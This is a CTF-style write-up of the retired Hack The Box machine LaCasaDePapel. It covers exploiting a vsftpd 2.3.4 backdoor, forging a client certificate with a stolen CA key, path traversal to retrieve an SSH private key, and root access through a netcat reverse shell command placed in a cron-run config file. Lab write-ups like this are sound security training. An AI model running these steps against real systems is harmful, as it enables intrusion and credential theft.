# Hack The Box - LaCasaDePapel

## Quick Summary

Hey guys today LaCasaDePapel retired and here’s my write-up about it. It was an easy interesting box, more of a ctf challenge than a realistic scenario but I still enjoyed it. It’s a Linux box and its ip is 10.10.10.131, I added it to /etc/hosts as lacasadepapel.htb. Let’s jump right in !

## Nmap

As always we will start with nmap to scan for open ports and services :
nmap -sV -sT -sC lacasadepapel.htb

We have http on port 80. https on port 443, ftp on port 21 and ssh on port 22.
Anonymous authentication wasn’t allowed on ftp so I checked http and https :

## HTTP

http://lacasadepapel.htb

We see an image of the characters from LaCasaDePapel (TV show) and a QR code for OTP, I scanned it with Google Authenticator on my phone :

As you can see I had to refresh it manually while other tokens refreshed automatically, no idea why but anyway I took the OTP and used test@test.com as email :

Then nothing happened, I just got the same page back again. I tried gobuster to see if I can find any sub directories and I didn’t get anything useful. Let’s check https.
https://lacasadepapel.htb

The same background with an error message saying : “Sorry, but you need to provide a client certificate to continue.”

## vsftpd 2.3.4, Psy Shell

After hitting dead ends with web, I checked the ftp service again, the version was vsftpd 2.3.4 (from the nmap scan) so I searched for exploits :

Command Execution and there is a metasploit module for it, but the exploit didn’t work :

Apparently there was another service running on port 6200, a quick nmap scan shows that the port is open :

So I connected to that port with nc to see what’s there :

The banner says Psy Shell v0.9.9, I didn’t know what Psy Shell was but a quick search and I found the website. It’s a shell used for interactive php debugging and we can use it to execute php.
I tried to execute system commands but I couldn’t :

I tried to use scandir() to see the current directory listing and it worked :

I could list the directories in /home :

Now we know the users on the box : berlin,dali,nairobi,oslo and professor.
I found the user flag in /home/berlin, however I got permission denied when I tried to read it :

Same for .ssh, after a lot of failed attempts to get RCE, I looked at the help menu to see if there’s anything helpful:

I used ls to see what variables are there :

There was only one variable called tokyo , let’s check that variable:

The function sign() is using the private key /home/nairobi/ca.key, we can grab that key and create a client certificate to access the https service we couldn’t access before.

## Client Certificate Generation

First, we will create a certificate signing request (CSR) :

Then we will use it to generate the certificate :

And finally we will create a PKCS12 certificate :

Now we can import it to Firefox :

We have to Remove the ssl exception we gave earlier to https://lacasadepapel.htb, then we will visit it again and it will request our client certificate :

After gaining access we have an option to choose season 1 or season 2, clicking on one of them will take us to a page to download episodes :

As you can see in the url there is a get parameter called path, which means that the php script reads files from a given path and lists them (in this case directory : SEASON-1). If that parameter doesn’t get filtered correctly it can cause a path traversal vulnerability allowing us to list files in other directories. However listing files doesn’t help us in any way, we already can do that with Psy Shell. But if we try to download an episode, 01.avi for example :

Decoding that base-64 string we get this :

It uses the path to request files, let’s see where are we first :
https://lacasadepapel/?path=../

We are in berlin‘s home directory (Because the user flag is there).
https://lacasadepapel/?path=../.ssh/

Let’s download id_rsa, we know that the path is ../.ssh/id_rsa :

-n for no new lines.

We found the key in berlin‘s home directory, however I couldn’t get ssh as berlin, I tried other users and professor worked :

I couldn’t read the flag as professor, so I downloaded it like I downloaded the ssh key :

We owned user.

## Privilege Escalation, Root Flag

In the home directory of professor there are 2 interesting files : memcached.ini and memcached.js :

We can’t read memcached.js but we can read memecached.ini, we can’t write to both.

memcached.ini is executing this command : /usr/bin/node /home/professor/memcached.js as nobody by using sudo. Most likely it will be running as root, I ran pspy and saw that the command gets executed periodically :

The uid is 65534 which is the uid of nobody :

We can’t write to memcached.ini, but we can delete it and create a new one :

I changed the command from sudo -u nobody /usr/bin/node /home/professor/memcached.js to /usr/bin/nc 10.10.xx.xx 1337 -e /bin/bash. After some seconds I got a reverse shell as root :

And we owned root !
That’s it , Feedback is appreciated !